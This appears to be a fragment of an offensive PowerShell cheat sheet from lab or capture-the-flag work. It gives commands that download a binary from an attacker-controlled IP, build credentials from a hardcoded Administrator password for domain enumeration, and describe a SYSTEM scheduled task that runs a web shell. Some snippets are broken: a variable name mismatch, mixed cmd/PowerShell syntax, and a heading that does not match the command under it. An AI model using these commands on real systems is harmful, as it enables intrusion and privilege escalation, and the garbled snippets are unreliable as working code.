Invoke-WebRequest http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe'
# Alias iwr is also accepted
iwr http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe'
Download and execute - Outside of a Powershell session
dir env:
# Alternative to whoami
echo %env:username
Create PSCredential object
Use alternate credentials for any function.
# use an alterate credentials for any function
$password = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPassword)
Get-DomainUser -Credential $Cred
Create a scheduled task as an elevated user
The command below creates the scheduled task named shell that execute the shell_admin.exe binary located to C:\inetpub\wwwroot\shell_admin.exe with the privilege of SYSTEM. The -Credential flag is to be able to create the scheduled task as this command requires command high privileges.